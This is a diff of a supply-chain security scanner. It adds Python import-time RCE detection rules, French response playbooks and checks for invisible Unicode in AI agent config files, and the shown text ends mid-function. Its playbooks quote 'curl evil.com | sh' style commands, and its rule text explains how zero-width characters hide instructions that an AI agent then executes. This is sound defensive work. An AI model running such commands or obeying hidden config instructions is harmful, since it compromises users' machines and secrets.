muaddib-scanner 2.11.39 → 2.11.41

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "muaddib-scanner",
-  "version": "2.11.39",
+  "version": "2.11.41",
   "description": "Supply-chain threat detection & response for npm & PyPI/Python",
   "main": "src/index.js",
   "bin": {

package/{self-scan-v2.11.39.json → self-scan-v2.11.41.json}

@@ -1,6 +1,6 @@
 {
   "target": "node_modules",
-  "timestamp": "2026-05-25T08:33:11.787Z",
+  "timestamp": "2026-05-25T10:35:47.158Z",
   "threats": [
     {
       "type": "string_mutation_obfuscation",
@@ -870,6 +870,27 @@
       "playbook": "CRITIQUE: Execution de commande shell dangereuse detectee. Isoler la machine. Verifier si la commande a ete executee.",
       "points": 3
     },
+    {
+      "type": "unicode_invisible_injection",
+      "severity": "CRITICAL",
+      "message": "10 invisible Unicode characters detected (zero-width, variation selectors, tag chars). Possible hidden payload encoded via invisible codepoints.",
+      "file": "iconv-lite/encodings/sbcs-data-generated.js",
+      "count": 1,
+      "reductions": [],
+      "originalSeverity": "CRITICAL",
+      "confidenceTier": "medium",
+      "rule_id": "MUADDIB-OBF-003",
+      "rule_name": "Unicode Invisible Character Injection",
+      "confidence": "high",
+      "domain": "malware",
+      "references": [
+        "https://www.aikido.dev/blog/glassworm-returns-unicode-attack-github-npm-vscode",
+        "https://attack.mitre.org/techniques/T1027/"
+      ],
+      "mitre": "T1027",
+      "playbook": "CRITIQUE: Caracteres Unicode invisibles detectes (zero-width, variation selectors). Technique GlassWorm: du code malveillant est encode via des variation selectors invisibles dans les editeurs. Analyser le fichier avec un editeur hexa. Supprimer le package immediatement. Verifier les autres fichiers du projet pour des injections similaires.",
+      "points": 25
+    },
     {
       "type": "high_entropy_string",
       "severity": "LOW",
@@ -1107,17 +1128,17 @@
   ],
   "python": null,
   "summary": {
-    "total": 51,
-    "critical": 2,
+    "total": 52,
+    "critical": 3,
     "high": 6,
     "medium": 28,
     "low": 15,
     "riskScore": 35,
     "riskLevel": "MEDIUM",
     "globalRiskScore": 100,
-    "maxFileScore": 25,
+    "maxFileScore": 26,
     "packageScore": 1,
-    "mostSuspiciousFile": "ajv/lib/ajv.js",
+    "mostSuspiciousFile": "iconv-lite/encodings/sbcs-data-generated.js",
     "fileScores": {
       "esquery/parser.js": 5,
       "ajv/lib/ajv.js": 25,
@@ -1133,7 +1154,7 @@
       "eslint/lib/config/config-loader.js": 11,
       "eslint/lib/eslint/eslint-helpers.js": 25,
       "eslint/lib/eslint/eslint.js": 13,
-      "iconv-lite/encodings/sbcs-data-generated.js": 1,
+      "iconv-lite/encodings/sbcs-data-generated.js": 26,
       "iconv-lite/encodings/sbcs-data.js": 1,
       "ajv/lib/compile/formats.js": 1
     },
@@ -1169,6 +1190,12 @@
         "points": 25,
         "reason": "Dynamic import() with computed URL argument — remote code loading from dynamically constructed URL."
       },
+      {
+        "rule": "MUADDIB-OBF-003",
+        "type": "unicode_invisible_injection",
+        "points": 25,
+        "reason": "10 invisible Unicode characters detected (zero-width, variation selectors, tag chars). Possible hidden payload encoded via invisible codepoints."
+      },
       {
         "rule": "MUADDIB-AST-006",
         "type": "dynamic_require",
@@ -1461,7 +1488,7 @@
     "tierCounts": {
       "verified": 0,
       "high": 0,
-      "medium": 9,
+      "medium": 10,
       "low": 42
     },
     "perceivedFlagged": 0

package/src/pipeline/executor.js

@@ -20,6 +20,7 @@ const { deobfuscate } = require('../scanner/deobfuscate.js');
 const { buildModuleGraph, annotateTaintedExports, detectCrossFileFlows, annotateSinkExports, detectCallbackCrossFileFlows, detectEventEmitterFlows } = require('../scanner/module-graph');
 const { loadCachedIOCs, checkIOCStaleness } = require('../ioc/updater.js');
 const { detectPythonProject, normalizePythonName } = require('../scanner/python.js');
+const { scanPythonSource } = require('../scanner/python-source.js');
 const { Spinner, listInstalledPackages, wasFilesCapped, getOverflowFiles, debugLog } = require('../utils.js');
 const { getMaxFileSize } = require('../shared/constants.js');
 const { scanParanoid } = require('../scanner/paranoid.js');
@@ -202,7 +203,7 @@ async function execute(targetPath, options, pythonDeps, warnings) {
     'scanDependencies', 'scanHashes', 'analyzeDataFlow', 'scanTyposquatting',
     'scanGitHubActions', 'matchPythonIOCs', 'checkPyPITyposquatting',
     'scanEntropy', 'scanAIConfig', 'scanIocStrings', 'scanAntiForensic',
-    'scanStubPackage', 'scanMonorepo', 'scanTrustedDepDiff'
+    'scanStubPackage', 'scanMonorepo', 'scanTrustedDepDiff', 'scanPythonSource'
   ];
 
   const settledResults = await Promise.allSettled([
@@ -228,7 +229,12 @@ async function execute(targetPath, options, pythonDeps, warnings) {
     // Wrapped in withTimeout as defense in depth: scanner has its own 10s + 5s × N
     // internal timeouts, but a registry slowdown with many added deps could exceed
     // the static-scan budget without this cap.
-    withTimeout(() => scanTrustedDepDiff(targetPath, options), 'scanTrustedDepDiff')
+    withTimeout(() => scanTrustedDepDiff(targetPath, options), 'scanTrustedDepDiff'),
+    // PYSRC-001..008 (v2.11.25, TrapDoor PyPI gap). Detect import-time RCE
+    // in __init__.py / setup.py / top-level .py files. Runs always — not gated
+    // on detectPythonProject() because an attacker can ship a malicious __init__.py
+    // without a requirements.txt. Walker is cheap (just a depth-1 readdir).
+    yieldThen(() => scanPythonSource(targetPath))
   ]);
 
   // Extract results: use empty array for rejected scanners, log errors
@@ -258,7 +264,8 @@ async function execute(targetPath, options, pythonDeps, warnings) {
     antiForensicThreats,
     stubPackageThreats,
     monorepoThreats,
-    trustedDepDiffThreats
+    trustedDepDiffThreats,
+    pythonSourceThreats
   ] = scanResult;
 
   // Emit warning if file count cap was hit + quick-scan overflow files
@@ -339,6 +346,7 @@ async function execute(targetPath, options, pythonDeps, warnings) {
     ...stubPackageThreats,
     ...monorepoThreats,
     ...trustedDepDiffThreats,
+    ...pythonSourceThreats,
     ...crossFileFlows.filter(f => f && f.sourceFile && f.sinkFile).map(f => ({
       type: f.type,
       severity: f.severity,

package/src/response/playbooks.js

@@ -399,6 +399,69 @@ const PLAYBOOKS = {
     'Technique Shai-Hulud (TeamPCP). Supprimer les fichiers .claude/settings.json ' +
     'et .vscode/tasks.json avant ouverture.',
 
+  aiconf_unicode_obfuscation:
+    'CRITIQUE: Fichier de config d\'agent IA contient des caracteres Unicode invisibles ' +
+    '(zero-width, directional override, variation selectors). Technique TrapDoor (mai 2026): ' +
+    'l\'attaquant insere des U+200B au milieu de mots-cles pour echapper a la revue humaine ' +
+    'et aux regex statiques, tandis que l\'agent IA (Claude, Cursor) lit le contenu normalise ' +
+    'et execute le payload cache. NE PAS ouvrir ce projet avec un agent IA. Ouvrir le fichier ' +
+    'dans un editeur qui affiche les caracteres invisibles (VS Code: "editor.renderControlCharacters") ' +
+    'pour inspecter le contenu reel. Supprimer le fichier ou nettoyer les caracteres invisibles ' +
+    'avant toute utilisation. Si deja ouvert avec un agent IA, regenerer tous les secrets touches.',
+
+  import_time_exec:
+    'CRITIQUE: Le fichier Python (__init__.py / setup.py / module top-level) execute exec() ou eval() ' +
+    'a l\'import ou pip install. RCE immediat sur la machine de l\'utilisateur. ' +
+    'NE PAS installer ce package. Si deja installe: pip uninstall immediatement, ' +
+    'auditer les processus en cours, regenerer les credentials potentiellement compromis. ' +
+    'Inspecter le code exec/eval pour identifier le payload reel.',
+
+  import_time_subprocess:
+    'CRITIQUE: Le fichier Python spawn un processus externe (subprocess.Popen/run/call/check_output) ' +
+    'a l\'import ou pip install. Generalement utilise pour fetch + execute remote payload, ' +
+    'lateral movement, ou installation de persistence. NE PAS installer. Verifier le contenu ' +
+    'de l\'appel pour identifier la commande executee. Auditer les processus enfants si deja installe.',
+
+  import_time_os_system:
+    'CRITIQUE: Le fichier Python execute des commandes shell (os.system / os.popen / os.spawn / os.exec) ' +
+    'a l\'import ou pip install. Pattern frequent: "curl evil.com | sh" ou "wget evil.com | bash". ' +
+    'NE PAS installer. Inspecter la commande exacte. Si execute: considerer la machine compromise.',
+
+  import_time_fetch_exec:
+    'CRITIQUE: Pattern TrapDoor detecte. Le fichier Python fetch un payload depuis le reseau ' +
+    '(urllib/requests/http.client/httpx/aiohttp) ET execute du code (exec/eval) dans le meme fichier. ' +
+    'C\'est la signature directe d\'une remote-payload-then-RCE. NE PAS installer. ' +
+    'Bloquer le domaine du fetch dans le firewall. Si execute: incident response complet, ' +
+    'regenerer TOUS les secrets sur la machine (SSH, AWS, GitHub, npm, env vars).',
+
+  import_time_base64_exec:
+    'CRITIQUE: Le fichier Python base64-decode du contenu ET execute (exec/eval) dans le meme fichier. ' +
+    'Pattern d\'obfuscation classique: payload encode pour echapper a la revue + grep statique. ' +
+    'NE PAS installer. Decoder le base64 manuellement pour identifier le payload reel ' +
+    '(python3 -c "import base64; print(base64.b64decode(b\'<payload>\').decode())").',
+
+  import_time_deserialization:
+    'CRITIQUE: Le fichier Python utilise pickle/marshal/dill/cloudpickle .loads() au niveau module. ' +
+    'Ces fonctions sont triviallement RCE si l\'input deserializise vient d\'une source attaquant-controllee ' +
+    '(fichier sur disque, requete HTTP, env var). NE PAS installer si l\'origine du blob deserialize ' +
+    'n\'est pas un fichier de donnees interne au package. Si interne: verifier l\'integrite (signature, hash).',
+
+  dynamic_dangerous_import:
+    'HIGH: Le fichier Python utilise __import__() avec un nom hardcode dangereux ' +
+    '(subprocess, os, requests, urllib, socket, http, ssl, ctypes, importlib). ' +
+    'Pattern d\'obfuscation: evite "import X" statique pour bypass les scanners qui ne tracent ' +
+    'que les imports declares. Combinaison avec exec/subprocess/fetch indique malveillance. ' +
+    'Inspecter manuellement les appels suivants au module dynamiquement importe.',
+
+  python_source_unicode_obfuscation:
+    'CRITIQUE: Fichier Python contient ≥5 caracteres Unicode invisibles ' +
+    '(zero-width, directional override, variation selectors, tag characters). ' +
+    'Python rejette les identifiers avec ZW (PEP 3131 SyntaxError), donc le vecteur est ' +
+    'soit (a) obfuscation dans des strings (GlassWorm-style payload encoding via variation selectors), ' +
+    'soit (b) comments avec ZW pour induire en erreur la revue humaine. ' +
+    'NE PAS installer. Ouvrir le fichier dans un editeur affichant les caracteres invisibles ' +
+    '(VS Code: "editor.renderControlCharacters") pour inspecter le contenu reel.',
+
   ai_agent_abuse:
     'CRITIQUE: Un agent IA (Claude, Gemini, Q) est invoque avec des flags de bypass de securite ' +
     '(--dangerously-skip-permissions, --yolo, --trust-all-tools). Technique s1ngularity/Nx. ' +

package/src/rules/index.js

@@ -224,6 +224,121 @@ const RULES = {
     ],
     mitre: 'T1195.002'
   },
+
+  // PYSRC-001 a 008 — Python source scanner (TrapDoor PyPI gap, v2.11.25).
+  // python.js est manifest-only ; ast.js/dataflow.js sont JS-only ; ioc-strings.js
+  // fait du literal match. Aucun ne couvre l'execution a l'import via __init__.py
+  // / setup.py. Ces 8 regles ferment ce gap.
+  import_time_exec: {
+    id: 'MUADDIB-PYSRC-001',
+    name: 'Python Import-Time exec/eval',
+    severity: 'CRITICAL',
+    confidence: 'high',
+    domain: 'malware',
+    description: 'Fichier Python (__init__.py, setup.py, top-level *.py) contient exec()/eval() — execution directe de code a l\'import ou a pip install. RCE immediat sur la machine de l\'utilisateur. Pattern central de TrapDoor (mai 2026).',
+    references: [
+      'https://socket.dev/blog/trapdoor-crypto-stealer-npm-pypi-crates',
+      'https://attack.mitre.org/techniques/T1059/006/'
+    ],
+    mitre: 'T1059.006'
+  },
+  import_time_subprocess: {
+    id: 'MUADDIB-PYSRC-002',
+    name: 'Python Import-Time subprocess',
+    severity: 'CRITICAL',
+    confidence: 'high',
+    domain: 'malware',
+    description: 'Fichier Python contient subprocess.Popen/run/call/check_output au niveau module — spawn d\'un processus externe a l\'import ou pip install. Utilise pour fetch + execute remote payload ou pour latteral movement.',
+    references: [
+      'https://socket.dev/blog/trapdoor-crypto-stealer-npm-pypi-crates',
+      'https://attack.mitre.org/techniques/T1059/006/'
+    ],
+    mitre: 'T1059.006'
+  },
+  import_time_os_system: {
+    id: 'MUADDIB-PYSRC-003',
+    name: 'Python Import-Time os.system / os.popen / os.spawn / os.exec',
+    severity: 'CRITICAL',
+    confidence: 'high',
+    domain: 'malware',
+    description: 'Fichier Python contient os.system(), os.popen(), os.spawn*() ou os.exec*() au niveau module — shell execution a l\'import ou pip install. Generalement utilise pour curl|sh ou wget|bash remote payload.',
+    references: [
+      'https://attack.mitre.org/techniques/T1059/006/',
+      'https://attack.mitre.org/techniques/T1059/004/'
+    ],
+    mitre: 'T1059.006'
+  },
+  import_time_fetch_exec: {
+    id: 'MUADDIB-PYSRC-004',
+    name: 'Python Import-Time Fetch + Exec (TrapDoor pattern)',
+    severity: 'CRITICAL',
+    confidence: 'high',
+    domain: 'malware',
+    description: 'Compound detection : le meme fichier Python contient (urllib.request / requests / http.client / httpx / aiohttp) ET exec()/eval(). Signature directe de TrapDoor : telecharge un payload depuis le C2 et l\'execute. Implique RCE + capacite C2 active.',
+    references: [
+      'https://socket.dev/blog/trapdoor-crypto-stealer-npm-pypi-crates',
+      'https://attack.mitre.org/techniques/T1105/',
+      'https://attack.mitre.org/techniques/T1059/006/'
+    ],
+    mitre: 'T1105'
+  },
+  import_time_base64_exec: {
+    id: 'MUADDIB-PYSRC-005',
+    name: 'Python Import-Time Base64 Decode + Exec',
+    severity: 'CRITICAL',
+    confidence: 'high',
+    domain: 'malware',
+    description: 'Compound detection : le meme fichier Python contient base64.b64decode / codecs.decode ET exec()/eval(). Pattern d\'obfuscation classique : payload encode en base64 (parfois chaine multiple) puis execute. Vu dans Lazarus PyPI campaigns + TrapDoor.',
+    references: [
+      'https://socket.dev/blog/trapdoor-crypto-stealer-npm-pypi-crates',
+      'https://attack.mitre.org/techniques/T1027/',
+      'https://attack.mitre.org/techniques/T1059/006/'
+    ],
+    mitre: 'T1027'
+  },
+  import_time_deserialization: {
+    id: 'MUADDIB-PYSRC-006',
+    name: 'Python Import-Time Unsafe Deserialization',
+    severity: 'CRITICAL',
+    confidence: 'high',
+    domain: 'vulnerability',
+    description: 'Fichier Python utilise pickle/cPickle/marshal/dill/cloudpickle/jsonpickle/shelve .loads() au niveau module. Ces fonctions sont trivialement RCE si l\'input est attaquant-controle (deserialization = code execution). Risque critique meme sans malveillance prouvee.',
+    references: [
+      'https://docs.python.org/3/library/pickle.html#restricting-globals',
+      'https://attack.mitre.org/techniques/T1059/006/',
+      'https://cwe.mitre.org/data/definitions/502.html'
+    ],
+    mitre: 'T1059.006'
+  },
+  dynamic_dangerous_import: {
+    id: 'MUADDIB-PYSRC-007',
+    name: 'Python Dynamic __import__ of Dangerous Module',
+    severity: 'HIGH',
+    confidence: 'medium',
+    domain: 'malware',
+    description: 'Fichier Python utilise __import__() avec un nom hardcode dangereux (subprocess, os, requests, urllib, socket, http, ssl, ctypes, importlib). Pattern d\'obfuscation : evite l\'instruction "import X" statique pour echapper aux scanners qui ne tracent que les imports declares.',
+    references: [
+      'https://attack.mitre.org/techniques/T1027/',
+      'https://docs.python.org/3/library/functions.html#import__'
+    ],
+    mitre: 'T1027'
+  },
+  python_source_unicode_obfuscation: {
+    id: 'MUADDIB-PYSRC-008',
+    name: 'Python Source Unicode Obfuscation',
+    severity: 'CRITICAL',
+    confidence: 'high',
+    domain: 'malware',
+    description: 'Fichier Python contient ≥5 caracteres Unicode invisibles (zero-width, directional override, variation selectors, tag characters). Mirror de AICONF-004 pour les sources .py. Python rejette les identifiers avec ZW chars (SyntaxError, PEP 3131), donc le vecteur principal c\'est l\'obfuscation dans les strings (GlassWorm-style payload encoding) ou dans les comments (mislead human review).',
+    references: [
+      'https://www.aikido.dev/blog/glassworm-returns-unicode-attack-github-npm-vscode',
+      'https://socket.dev/blog/trapdoor-crypto-stealer-npm-pypi-crates',
+      'https://trojansource.codes/',
+      'https://attack.mitre.org/techniques/T1027/'
+    ],
+    mitre: 'T1027.013'
+  },
+
   suspicious_file: {
     id: 'MUADDIB-DEP-002',
     name: 'Suspicious File in Dependency',
@@ -914,6 +1029,21 @@ const RULES = {
     ],
     mitre: 'T1546'
   },
+  aiconf_unicode_obfuscation: {
+    id: 'MUADDIB-AICONF-004',
+    name: 'Zero-Width Unicode Obfuscation in AI Config',
+    severity: 'CRITICAL',
+    confidence: 'high',
+    domain: 'malware',
+    description: 'Fichier de configuration d\'agent IA (.cursorrules, CLAUDE.md, copilot-instructions.md) contient des caracteres Unicode invisibles (zero-width, directional override, variation selectors) qui cachent des instructions a la revue humaine ou cassent des mots-cles pour echapper a la detection regex. Technique TrapDoor (mai 2026): cu​rl|sh interspersee de U+200B passe au travers du regex /curl/ tandis que l\'agent IA execute le payload normalise.',
+    references: [
+      'https://socket.dev/blog/trapdoor-crypto-stealer-npm-pypi-crates',
+      'https://www.aikido.dev/blog/glassworm-returns-unicode-attack-github-npm-vscode',
+      'https://trojansource.codes/',
+      'https://attack.mitre.org/techniques/T1027/'
+    ],
+    mitre: 'T1027.013'
+  },
 
   require_cache_poison: {
     id: 'MUADDIB-AST-019',

package/src/scanner/ai-config.js

@@ -18,6 +18,14 @@
 
 const fs = require('fs');
 const path = require('path');
+const { countInvisibleUnicode, stripInvisibleUnicode } = require('../shared/unicode-invisibles.js');
+
+// Threshold above which an AI config file is flagged as ZW-Unicode-obfuscated.
+// Lower than obfuscation.js (10) because .cursorrules / CLAUDE.md should never
+// legitimately contain invisible codepoints — even international content uses
+// only visible chars (CJK, accents, emoji with U+FE0F variation selector are
+// NOT counted by countInvisibleUnicode).
+const AI_CONFIG_ZW_THRESHOLD = 5;
 
 // AI agent config files to scan for prompt injection (relative to project root)
 const AI_CONFIG_FILES = [
@@ -111,7 +119,12 @@ function scanAIConfig(targetPath) {
     }
 
     const relPath = configFile;
-    const fileThreats = analyzeAIConfigFile(content, relPath);
+    // Normalize invisible Unicode BEFORE running regex patterns.
+    // Without this, an attacker can split keywords with U+200B (`cu​rl`) to
+    // evade /curl\s+/ — the exact TrapDoor (mai 2026) .cursorrules vector.
+    const invisibleCount = countInvisibleUnicode(content);
+    const normalized = invisibleCount > 0 ? stripInvisibleUnicode(content) : content;
+    const fileThreats = analyzeAIConfigFile(normalized, relPath, invisibleCount);
     threats.push(...fileThreats);
   }
 
@@ -218,14 +231,30 @@ function analyzeIDEHookFile(content, relPath) {
 }
 
 /**
- * Analyze a single AI config file for prompt injection patterns
+ * Analyze a single AI config file for prompt injection patterns.
+ *
+ * @param {string} content - File content, already normalized (invisible Unicode stripped).
+ * @param {string} relPath - Relative path of the config file.
+ * @param {number} invisibleCount - Number of invisible Unicode codepoints in the original (pre-strip) content.
  */
-function analyzeAIConfigFile(content, relPath) {
+function analyzeAIConfigFile(content, relPath, invisibleCount) {
   const threats = [];
   let hasShellCommand = false;
   let hasExfiltration = false;
   let hasCredentialAccess = false;
 
+  // Zero-width / directional Unicode obfuscation (TrapDoor, mai 2026).
+  // An attacker can hide instructions or split keywords with U+200B etc. so
+  // human reviewers see "harmless" text while the AI agent reads the payload.
+  if (invisibleCount >= AI_CONFIG_ZW_THRESHOLD) {
+    threats.push({
+      type: 'aiconf_unicode_obfuscation',
+      severity: 'CRITICAL',
+      message: `AI config contains ${invisibleCount} invisible Unicode characters (zero-width / directional / variation selectors) in ${relPath} — content was normalized before pattern matching. Possible hidden instructions or keyword-splitting evasion (TrapDoor pattern).`,
+      file: relPath
+    });
+  }
+
   // Check shell command patterns
   for (const pattern of SHELL_COMMAND_PATTERNS) {
     if (pattern.regex.test(content)) {

package/src/scanner/obfuscation.js

@@ -1,6 +1,7 @@
 const fs = require('fs');
 const path = require('path');
 const { findFiles, forEachSafeFile, debugLog } = require('../utils.js');
+const { countInvisibleUnicode } = require('../shared/unicode-invisibles.js');
 
 // node_modules NOT excluded: detect obfuscated code in dependencies.
 // dist/build/out/output excluded: bundled output is always flagged as isPackageOutput (LOW)
@@ -198,52 +199,4 @@ function hasLargeStringArray(content) {
   return false;
 }
 
-/**
- * Count invisible Unicode codepoints in content (GlassWorm detection).
- * Covers BMP zero-width chars, variation selectors, and supplementary plane
- * tag characters / variation selectors supplement via codePointAt iteration.
- *
- * Codepoints detected:
- * - U+200B, U+200C, U+200D (zero-width space/joiner/non-joiner)
- * - U+FEFF (BOM — only if position > 0; pos 0 is legitimate BOM)
- * - U+2060 (word joiner), U+180E (Mongolian vowel separator)
- * - U+FE00-U+FE0E (variation selectors — excludes U+FE0F emoji presentation selector)
- * - U+E0100-U+E01EF (variation selectors supplement)
- * - U+E0001-U+E007F (tag characters)
- */
-function countInvisibleUnicode(content) {
-  let count = 0;
-  for (let i = 0; i < content.length; i++) {
-    const cp = content.codePointAt(i);
-    // BMP invisible chars
-    if (cp === 0x200B || cp === 0x200C || cp === 0x200D ||
-        cp === 0x2060 || cp === 0x180E) {
-      count++;
-    }
-    // BOM only suspicious after position 0
-    else if (cp === 0xFEFF && i > 0) {
-      count++;
-    }
-    // BMP variation selectors (U+FE00-U+FE0E) — excludes U+FE0F (emoji presentation selector)
-    else if (cp >= 0xFE00 && cp <= 0xFE0E) {
-      count++;
-    }
-    // Supplementary plane: variation selectors supplement (U+E0100-U+E01EF)
-    else if (cp >= 0xE0100 && cp <= 0xE01EF) {
-      count++;
-      i++; // skip surrogate pair low half
-    }
-    // Supplementary plane: tag characters (U+E0001-U+E007F)
-    else if (cp >= 0xE0001 && cp <= 0xE007F) {
-      count++;
-      i++; // skip surrogate pair low half
-    }
-    // Skip surrogate pair low half for other supplementary chars
-    else if (cp > 0xFFFF) {
-      i++;
-    }
-  }
-  return count;
-}
-
 module.exports = { detectObfuscation };

package/src/scanner/python-source.js

@@ -0,0 +1,319 @@
+'use strict';
+
+/**
+ * Python Source Scanner — detects import-time / install-time RCE patterns.
+ *
+ * Created v2.11.25 (TrapDoor PyPI gap, mai 2026). `python.js` is a manifest
+ * parser (requirements.txt, setup.py, pyproject.toml — extracts dep names) ;
+ * it never reads package source. `ast.js` / `dataflow.js` use acorn (JS only)
+ * and skip `.py`. Only `ioc-strings.js` opens `.py` files, just for literal
+ * IOC matching. → A malicious `__init__.py` that fetches + execs a payload at
+ * import time was invisible to MUAD'DIB. This scanner closes that gap.
+ *
+ * Pas d'AST Python (CLAUDE.md interdit les deps runtime hors acorn / js-yaml /
+ * adm-zip / @inquirer/prompts). Détection par regex ciblées sur les API
+ * dangereuses, avec préprocessing :
+ *  - strip des full-line comments (`^\s*#.*$`)
+ *  - strip des triple-quoted strings (docstrings, block strings — réduit les
+ *    FPs sur les docs qui mentionnent `exec`)
+ *  - strip des chars Unicode invisibles via le helper partagé (mirror du fix
+ *    AICONF-004 : empêche `e<ZWSP>xec(` de bypass — bien que Python rejette
+ *    cet identifier comme SyntaxError, des invisibles dans des strings/comments
+ *    restent un signal d'obfuscation valide).
+ *
+ * Rules : PYSRC-001 à PYSRC-008. Voir src/rules/index.js pour le détail.
+ *
+ * Références :
+ *  - https://socket.dev/blog/trapdoor-crypto-stealer-npm-pypi-crates (mai 2026)
+ *  - https://attack.mitre.org/techniques/T1059/006/ (Command Scripting Interpreter: Python)
+ */
+
+const fs = require('fs');
+const path = require('path');
+const { countInvisibleUnicode, stripInvisibleUnicode } = require('../shared/unicode-invisibles.js');
+
+const MAX_FILE_SIZE = 1024 * 1024; // 1 MB cap, cohérent avec ai-config.js
+
+const PYSRC_UNICODE_THRESHOLD = 5;
+
+// Dirs to skip when looking for __init__.py at depth-1. Couvre les patterns
+// classiques (virtualenv, caches, tests, docs, build artifacts).
+const EXCLUDED_DIRS = new Set([
+  'tests', 'test', '__pycache__', '.pytest_cache', '.tox', '.nox',
+  '.venv', 'venv', 'env', '.env',
+  '.git', '.hg', '.svn',
+  'node_modules',
+  'examples', 'example', 'sample', 'samples',
+  'docs', 'doc',
+  'build', 'dist', 'site-packages',
+  '.mypy_cache', '.ruff_cache', '.pytype', '.pyre',
+  '.muaddib-cache', '.idea', '.vscode'
+]);
+
+// Files explicitly targeted at root (always scanned if present).
+const ROOT_TARGET_FILES = ['__init__.py', 'setup.py'];
+
+/**
+ * Locate Python files that execute at import or install time.
+ *
+ * @param {string} targetPath
+ * @returns {string[]} Absolute file paths, deduplicated.
+ */
+function findTargetPythonFiles(targetPath) {
+  const targets = new Set();
+
+  let rootEntries;
+  try {
+    rootEntries = fs.readdirSync(targetPath);
+  } catch {
+    return [];
+  }
+
+  // 1. ROOT_TARGET_FILES + every *.py at root (single-module packages)
+  for (const entry of rootEntries) {
+    if (!entry.endsWith('.py') && !ROOT_TARGET_FILES.includes(entry)) continue;
+    const full = path.join(targetPath, entry);
+    try {
+      if (fs.statSync(full).isFile()) targets.add(full);
+    } catch { /* ignore */ }
+  }
+
+  // 2. <subdir>/__init__.py at depth 1 (covers <pkg>/__init__.py layout)
+  for (const entry of rootEntries) {
+    if (EXCLUDED_DIRS.has(entry)) continue;
+    if (entry.startsWith('.') && entry !== '.') continue; // skip hidden dirs by default
+    const subdir = path.join(targetPath, entry);
+    try {
+      if (!fs.statSync(subdir).isDirectory()) continue;
+    } catch { continue; }
+
+    const initPy = path.join(subdir, '__init__.py');
+    try {
+      if (fs.statSync(initPy).isFile()) targets.add(initPy);
+    } catch { /* not a file */ }
+
+    // 3. src/<pkg>/__init__.py for PEP-518 src-layout
+    if (entry === 'src') {
+      let innerEntries;
+      try {
+        innerEntries = fs.readdirSync(subdir);
+      } catch { continue; }
+      for (const inner of innerEntries) {
+        if (EXCLUDED_DIRS.has(inner)) continue;
+        if (inner.startsWith('.')) continue;
+        const innerDir = path.join(subdir, inner);
+        try {
+          if (!fs.statSync(innerDir).isDirectory()) continue;
+        } catch { continue; }
+        const innerInit = path.join(innerDir, '__init__.py');
+        try {
+          if (fs.statSync(innerInit).isFile()) targets.add(innerInit);
+        } catch { /* not a file */ }
+      }
+    }
+  }
+
+  return [...targets];
+}
+
+/**
+ * Strip full-line Python comments (lines whose first non-whitespace char is `#`).
+ * Inline trailing comments are kept to avoid the complexity of a tokenizer.
+ *
+ * @param {string} content
+ * @returns {string}
+ */
+function stripPythonComments(content) {
+  return content.split(/\r?\n/).map(line => {
+    const trimmed = line.trimStart();
+    if (trimmed.startsWith('#')) return '';
+    return line;
+  }).join('\n');
+}
+
+/**
+ * Strip triple-quoted strings (`"""..."""` and `'''...'''`). These are
+ * typically docstrings or block-string literals containing free-form text
+ * that may mention keywords like `exec` or `subprocess` without being a real
+ * call site. Single-quoted strings are preserved (an attacker often hides
+ * the payload inside `exec("import os; ...")`).
+ *
+ * @param {string} content
+ * @returns {string}
+ */
+function stripTripleQuotedStrings(content) {
+  return content
+    .replace(/"""[\s\S]*?"""/g, '""')
+    .replace(/'''[\s\S]*?'''/g, "''");
+}
+
+// --- Pattern detectors. All operate on a content string that has already
+// been Unicode-normalized + comment-stripped + docstring-stripped.
+
+function detectImportTimeExec(content) {
+  // exec(...) or eval(...). Lookbehind excludes obj.exec(, ast.literal_eval(.
+  return /(?<![.\w])(exec|eval)\s*\(/.test(content);
+}
+
+function detectImportTimeSubprocess(content) {
+  return /\bsubprocess\.(Popen|run|call|check_output|check_call|getoutput|getstatusoutput)\s*\(/.test(content);
+}
+
+function detectImportTimeOsSystem(content) {
+  // os.system, os.popen, os.spawn*, os.execv/exec*
+  return /\bos\.(system|popen[234]?|spawn[a-z]+|exec[a-z]+)\s*\(/.test(content);
+}
+
+function detectNetworkFetch(content) {
+  if (/\burllib\.request\.urlopen\s*\(/.test(content)) return true;
+  if (/\burllib2\.urlopen\s*\(/.test(content)) return true;
+  if (/\brequests\.(get|post|put|delete|patch|head|options|request)\s*\(/.test(content)) return true;
+  if (/\bhttp\.client\.HTTPS?Connection\b/.test(content)) return true;
+  if (/\bhttpx\.(get|post|put|delete|patch|head|options|request|Client|AsyncClient)\b/.test(content)) return true;
+  if (/\baiohttp\.ClientSession\b/.test(content)) return true;
+  return false;
+}
+
+function detectBase64Decode(content) {
+  if (/\bbase64\.(b64|b32|b16|standard_b64|urlsafe_b64)decode\s*\(/.test(content)) return true;
+  if (/\bcodecs\.decode\s*\(/.test(content)) return true;
+  return false;
+}
+
+function detectDeserialization(content) {
+  return /\b(pickle|cPickle|marshal|dill|cloudpickle|jsonpickle|shelve)\.loads?\s*\(/.test(content);
+}
+
+function detectDynamicDangerousImport(content) {
+  return /__import__\s*\(\s*['"](subprocess|os|requests|urllib|urllib2|socket|http|ssl|ctypes|importlib)['"]/.test(content);
+}
+
+/**
+ * Scan Python source files under targetPath for import-time / install-time RCE.
+ *
+ * @param {string} targetPath
+ * @returns {Array<{type: string, severity: string, message: string, file: string}>}
+ */
+function scanPythonSource(targetPath) {
+  const threats = [];
+
+  const files = findTargetPythonFiles(targetPath);
+  if (files.length === 0) return threats;
+
+  for (const file of files) {
+    let stat;
+    try {
+      stat = fs.statSync(file);
+    } catch { continue; }
+    if (!stat.isFile() || stat.size === 0 || stat.size > MAX_FILE_SIZE) continue;
+
+    let rawContent;
+    try {
+      rawContent = fs.readFileSync(file, 'utf8');
+    } catch { continue; }
+
+    const relPath = path.relative(targetPath, file);
+
+    // 1. PYSRC-008 — Unicode obfuscation (computed on raw content, before strip).
+    const invisibleCount = countInvisibleUnicode(rawContent);
+    if (invisibleCount >= PYSRC_UNICODE_THRESHOLD) {
+      threats.push({
+        type: 'python_source_unicode_obfuscation',
+        severity: 'CRITICAL',
+        message: `${relPath}: ${invisibleCount} invisible Unicode chars (zero-width / directional / variation selectors) — possible obfuscation hiding payload content from human review.`,
+        file: relPath
+      });
+    }
+
+    // 2. Normalize Unicode, strip docstrings + full-line comments.
+    const normalized = invisibleCount > 0 ? stripInvisibleUnicode(rawContent) : rawContent;
+    const cleaned = stripPythonComments(stripTripleQuotedStrings(normalized));
+
+    // 3. Atomic detectors.
+    const hasExec = detectImportTimeExec(cleaned);
+    const hasSubprocess = detectImportTimeSubprocess(cleaned);
